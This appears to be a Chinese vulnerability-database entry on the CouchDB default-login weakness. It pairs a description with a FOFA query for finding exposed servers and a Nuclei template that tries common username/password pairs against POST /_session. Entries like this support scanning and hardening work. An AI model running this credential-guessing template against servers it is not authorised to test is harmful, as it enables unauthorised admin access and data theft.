漏洞信息
漏洞名称: CouchDB 默认登录弱口令漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: CouchDB是一个开源的NoSQL数据库,由Apache软件基金会开发,广泛应用于Web应用程序和分布式系统中,因其易于使用和灵活性而受到开发者的青睐。该漏洞涉及CouchDB的默认登录凭证问题,攻击者可以利用默认或弱密码轻易获得管理员权限。漏洞的技术根源在于系统部署时未修改默认的管理员用户名和密码,或者使用了容易被猜解的弱密码,这属于配置不当的安全问题。此漏洞的高危性在于,攻击者无需任何前置条件即可远程利用,成功利用后可以执行任意操作,包括数据泄露、数据篡改、服务中断等,对系统安全构成严重威胁。由于CouchDB在互联网上的广泛部署,这一问题的影响范围较大,建议管理员立即检查并修改默认凭证,以防范潜在的安全风险。
产品厂商: apache
产品名称: couchdb
影响版本: *
搜索语法: app=”APACHE-CouchDB”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fdefault-logins%2Fcouchdb%2Fcouchdb-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67
| id: couchdb-default-login
info: name: CouchDB - Default Login author: thefoggiest severity: high description: | CouchDB weak admin credentials were discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 16 fofa-query: app="APACHE-CouchDB" product: couchdb vendor: apache tags: default-login,couchdb,misconfig
http: - raw: - | POST /_session HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
name={{username}}&password={{password}}
payloads: username: - admin - administrator - couchdb - root password: - admin - test - password - couchdb attack: clusterbomb
stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '{"ok":true' - '"name":"' - '"roles":[' condition: and
- type: word part: header words: - application/json - AuthSession= condition: and
- type: status status: - 200
|